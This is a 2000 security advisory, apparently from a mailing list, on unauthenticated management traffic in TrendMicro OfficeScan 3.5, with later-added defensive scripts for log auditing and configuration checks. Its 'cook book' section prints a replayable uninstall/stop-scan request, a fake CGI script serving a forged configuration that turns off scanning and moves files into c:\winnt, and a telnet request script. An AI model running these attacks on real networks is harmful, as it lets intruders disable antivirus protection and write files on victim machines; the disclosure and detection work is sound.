Date: Fri, 3 Mar 2000 18:09:27 +0100
From: "Captain'z root" <[email protected]>
To: [email protected]
Subject: TrendMicro OfficeScan, numerous security holes, remote files modification.
All of you have certainly seen the possible general DoS attack against
OfficeScan: just connect a client to port 12345 without sending any TCP
FIN packet at the application time-out.
After several tests on OfficeScan 3.5, I realized there were numerous
other security flaws resulting in possible intrusion scenarios, and,
because of a lack of authentication/crypto protocol between clients and
OfficeScan, it can potentially be used as a trojan horse, with some
preliminary steps, resulting in a remote intrusion on every LAN.
Systems concerned are Windows 95, 98, 2000 and NT.
A malicious user on the internal network can:
1- remotely uninstall the anti virus
2- remotely start the scan on the machine
3- remotely stop the scan
4- remotely make the anti virus ineffective by modifying the scan
configuration file over the network on the target PC.
5- and finally, remotely write anywhere on the target file system!
COOK BOOK to hack OfficeScan through the LAN
Step 1- Replay Attack (simplest way to gain a general DOS over the LAN)
The first thing the LAN attacker has to do is sniff his own PC with OS
(OfficeScan) installed on it; then he has to catch an admin packet toward
any OfficeScan port 12345 in order to replay the same request.
An example of such a request:
..GET /?05680F545E88AED5392B885EE7142D
8BBF8E352693725430DC1E7F954FB345FE899F
01203B222CFAF8B05CA5D90CF5DEE738102AB1
CAEEE62F7F4AA36ECD20CB5EADEC2C54776650
D555A9415BE5348E7F00F981A5DBEE1F3AB30F
ABC433230F66B49982FDA5F077D07AF721CD79
18A5580C331BC4C2A959BF634112B4F9A93953
B8F64B02C881ED6C55BFCD62056134BBF8007E
FFB66435181A7762EE02B8913F545D2511897C
898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A
7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A
92BB978AC8751202C50EE40445DD6CD11CE11A
9906 HTTP/1.0..Host: X1.X2.X3.X4:12345..
User-Agent: OfficeScan/3.5..Accept: */*......
The exact format of the HTTP request isn't known; it may be a kind of
signature of the admin password and other local-network-specific
information, or maybe not. More information about this point will be
At least, the last 2 bytes in it (06 in our example) are needed to encode
the type of request. After further tests, some of these codes were
definitely identified:
03: used for the Alert.msg file on the remote system
04: uninstallation request
06: launch a virus scan on the pc
07: Stop the scan.
Because TmListen on the client side doesn't check for a particular admin
IP or use any other authentication protocol, the intruder can, without
any problem, open a connection to port 12345 and replay the requests
03, 04, 06 and 07.
But if he wishes to remotely modify the behavior of the anti virus, he
'll have to go to step 2.
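Since the client never checks where a management request comes from, the only place to catch a replayed 03/04/06/07 request is on the network. The following audit script is an added example for this post, not code from the advisory or from Trend: it parses connection-log lines into the request shape shown above (GET /?<hex blob>, last two hex digits = request type) and flags management requests to port 12345 whose source is not a known manager address. The log line format, the sample addresses and the hex blobs are constructed for the example.

```python
"""Added example (not part of the original advisory): audit connection logs
for OfficeScan 3.5 management requests to the client port 12345 that did
not originate from the manager.

It relies on the request shape the advisory documents: GET /?<hex blob>
HTTP/1.0, where the last two hex digits of the blob encode the request
type (03, 04, 06, 07). The log line format used below is constructed
for this example; adapt LOG_RE to whatever your sensor produces.
"""
import re

# Request-type codes identified in the advisory.
COMMAND_CODES = {
    "03": "push Alert.msg",
    "04": "uninstall anti virus",
    "06": "start scan",
    "07": "stop scan",
}

CLIENT_PORT = 12345

# Constructed log format: <src ip> -> <dst ip>:<port> "<request line>"
LOG_RE = re.compile(
    r'^(?P<src>\d+\.\d+\.\d+\.\d+) -> (?P<dst>\d+\.\d+\.\d+\.\d+):(?P<port>\d+) '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]"$'
)

# The management request path seen in the advisory: /?<hex blob>
QUERY_RE = re.compile(r'^/\?(?P<blob>[0-9A-Fa-f]+)$')


def parse_command(path):
    """Return the 2-digit request-type code from a /?<hex blob> path,
    or None when the path is not a management request."""
    m = QUERY_RE.match(path)
    if not m or len(m.group("blob")) < 2:
        return None
    return m.group("blob")[-2:].upper()


def audit(log_lines, manager_ips):
    """Return (src, dst, code, meaning) tuples for management requests to
    port 12345 whose source is not a known manager address. The client
    itself performs no such check, so it has to be done on the network."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m or int(m.group("port")) != CLIENT_PORT:
            continue
        code = parse_command(m.group("path"))
        if code is None:
            continue
        if m.group("src") not in manager_ips:
            findings.append((m.group("src"), m.group("dst"), code,
                             COMMAND_CODES.get(code, "unknown request type")))
    return findings


# Constructed sample log: 10.0.0.5 is the manager, 10.0.0.77 a workstation.
SAMPLE_LOG = [
    '10.0.0.5 -> 10.0.0.20:12345 "GET /?05680F545E889906 HTTP/1.0"',
    '10.0.0.77 -> 10.0.0.20:12345 "GET /?05680F545E889904 HTTP/1.0"',
    '10.0.0.77 -> 10.0.0.21:12345 "GET /?05680F545E889907 HTTP/1.0"',
    '10.0.0.77 -> 10.0.0.5:80 "GET /officescan/cgi/cgiOnStart.exe?UID=x HTTP/1.0"',
]

if __name__ == "__main__":
    for src, dst, code, meaning in audit(SAMPLE_LOG, {"10.0.0.5"}):
        print(f"{src} sent request type {code} ({meaning}) to {dst}:12345")
```

On the sample log the two requests from the workstation (an uninstall and a stop-scan) are reported and the manager's own start-scan request is not; the cgiOnStart.exe traffic to port 80 is ignored because only the client port is audited.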
Step 2- Remote manipulation (leading to hosts intrusions and/or general
Now a little more about the OfficeScan communication protocol.
It appears that client processes communicate regularly with numerous
resident CGIs on the manager side (with IIS installed on it) for, among
other things, file transfer purposes.
When the two client services are launched (TmListen.exe and
NTRScan.exe) they ask for a CGI called cgiOnStart.exe.
An example of such a request (sniffit was used this time):
GET /officescan/cgi/cgiOnStart.exe?UID=46318530-f063-11d3-91ae-00c04f4a4c99
&DATE=20000303&TIME=142930&COMPUTER=NOM&PLATFORM=Windows%20NT%204%2e0%2e1381
&IP=Y1.Y2.Y3.Y4&PTNFILE=665&PROGRAM=3.50&ENGINE=5.100&ENCY=35&DOMAIN=Hof
&HFIX=&INSTDATE=20000302&INSTTIME=185210&MOBILE=0&RELEASE=3.50 HTTP/1.0
..Accept: */*..User-Agent: OffficeScanNTClient..Host: X1.X2.X3.X4
..Connection: Keep-Alive
When the intruder sends a 06-type request for remote scanning, the
sniffer can catch some new requests toward the web port 80.
(Diagram, garbled in the archive; recoverable steps:) 1/ Request 06 sent
to TARGET; 2/ anti viral scan; 3/ GET, 4/ GET (returns the Cfg File),
5/ GET, all from TARGET toward [80] Network Manager.
So when the scan starts, the client asks the manager for a configuration
file that controls many aspects of the processes.
The CGI cgiRqCfg.exe gives a runtime-generated configuration file for
the scan, in plain text format over the network; the different
keywords present inside the file stay resident inside the Windows
By spoofing the manager and carefully designing a web server with the
same file structure and CGI name, our intruder will be able to forge
configuration files manually and so to remotely modify the anti virus
(Diagram, garbled in the archive; recoverable labels:) request 06 to the
target; the target's GET to [80] cgiRqCfg.exe is answered with the
Infectious Configuration File; MANAGER (disabled by IP spoofing).
What can I do with the configuration file?
OK, now just take a look at the various keywords:
[Scan Now Configuration]
Scan Memory=0
ExtList=.exe, .com
All this data is stored inside the
Time Scan registry key.
*By modifying MoveDir and CleanFailedMoveDir to the value
TARGET\\anywhere, it's possible to force the remote anti virus to write
all the infected files locally ANYWHERE on the file system, that is to
say in the Winnt directory too.
By modifying "ScanRemoveable", "ScanFixedDisk", "ScanCDRom" to zero, it
's possible to force the anti virus to scan nothing even though the
services are still alive.
This method is far stealthier for compromising a PC with a trojan
attached to a mail.
Modifying ExtList with a ".txt" value will force the anti virus to scan
only txt files ;)
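Because the configuration arrives in plain text and is kept in the Time Scan registry key, an administrator can at least check it for the tampered values described above. The checker below is an added example written for this post, not code from the advisory or from Trend. The key names ([Scan Now Configuration], ScanRemoveable, ScanFixedDisk, ScanCDRom, ScanALLFiles, ExtList, MoveDir, CleanFailedMoveDir) are the ones shown in the advisory; the list of system directories, the baseline configuration and its quarantine path are constructed assumptions.

```python
"""Added example (not part of the original advisory): check a
[Scan Now Configuration] block, as served by cgiRqCfg.exe in plain text or
as found under the Time Scan registry key, for the weakened settings the
advisory describes (media scanning switched off, ExtList narrowed so
executables are skipped, quarantine directories pointed at a system
directory).

The key names come from the advisory. SYSTEM_DIRS, the baseline
configuration below and its quarantine path are constructed assumptions.
"""

# Directories a quarantine/move target must never point into (assumed).
SYSTEM_DIRS = ("c:\\winnt", "c:\\windows")
# Extensions the scan must keep covering when ScanALLFiles is off.
REQUIRED_EXTS = {".exe", ".com"}


def parse_config(text):
    """Parse Key=Value lines under [Scan Now Configuration] into a dict."""
    cfg, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "Scan Now Configuration" and "=" in line:
            key, _, value = line.partition("=")
            cfg[key.strip()] = value.strip()
    return cfg


def check_config(cfg):
    """Return a list of findings; an empty list means nothing looks tampered."""
    findings = []
    # 1. Media scanning switched off while the services still run.
    for key in ("ScanRemoveable", "ScanFixedDisk", "ScanCDRom"):
        if cfg.get(key) == "0":
            findings.append(f"{key}=0: this media type is no longer scanned")
    # 2. Extension list narrowed so executables are never inspected.
    if cfg.get("ScanALLFiles") != "1":
        exts = {e.strip().lower() for e in cfg.get("ExtList", "").split(",") if e.strip()}
        missing = REQUIRED_EXTS - exts
        if missing:
            findings.append("ExtList skips executables: missing " + ", ".join(sorted(missing)))
    # 3. Infected files moved into a system directory.
    for key in ("MoveDir", "CleanFailedMoveDir"):
        target = cfg.get(key, "").lower().rstrip("\\")
        if any(target == d or target.startswith(d + "\\") for d in SYSTEM_DIRS):
            findings.append(f"{key} points into a system directory: {cfg[key]}")
    return findings


# Constructed: a forged file of the kind the advisory shows.
FORGED_CONFIG = r"""
[Scan Now Configuration]
Scan Memory=0
ScanALLFiles=0
ExtList=.txt
ScanRemoveable=0
ScanFixedDisk=0
ScanCDRom=0
VirusFoundAction=5
MoveDir=c:\winnt
CleanFailedAction=3
CleanFailedMoveDir=c:\winnt
"""

# Constructed: an expected baseline (the quarantine path is an assumption).
BASELINE_CONFIG = r"""
[Scan Now Configuration]
Scan Memory=1
ScanALLFiles=0
ExtList=.exe, .com
ScanRemoveable=1
ScanFixedDisk=1
ScanCDRom=1
MoveDir=c:\Program Files\Trend\OfficeScan\Quarantine
CleanFailedMoveDir=c:\Program Files\Trend\OfficeScan\Quarantine
"""

if __name__ == "__main__":
    for name, text in (("forged", FORGED_CONFIG), ("baseline", BASELINE_CONFIG)):
        print(name, check_config(parse_config(text)) or ["no findings"])
```

The forged sample produces six findings (three media types switched off, ExtList missing .exe and .com, and both move directories inside c:\winnt); the baseline produces none. Comparing the served file against such a baseline is a cheap way to notice that a spoofed manager has answered the cgiRqCfg.exe request.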
Source example of fake cgi:
echo "Content-type: text/plain"
echo "[Scan Now Configuration]"
echo "UID=N0thing th4nk you"
echo "Scan Memory=0"
echo "CompressedLayer=2"
echo "ScanALLFiles=0"
echo "ExtList= YES IT's POSS1bl3 !"
echo "ScanRemoveable=0"
echo "ScanFixedDisk=0"
echo "ScanCDRom=0"
echo "VirusFoundAction=5"
echo "BkUpIfClean=0"
echo "MoveDir=c:\winnt"
echo "CleanFailedAction=3"
echo "CleanFailedMoveDir=c:\winnt"
echo "Reserved="
echo "Pragma: no-cache"
echo "Content-type: text/plain;charset=utf-8"
echo "1"
the little script for the scan request: target_client_ip
sleep 2
echo "GET
echo "Host: "$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
sleep 5
)| telnet $1 12345 2>&1 | tee -a ./log.txt
In fact, there is not a lot of choice, I think.
Users should stop their service NTlisten.exe until Trend builds
the new version.
However, please ask the Trend team for more suggestions.
Please don't use these few lines for any illegal purpose, and ask
TrendMicro for any further questions.
Gregory Duchemin
Network & Security Engineer.
[email protected]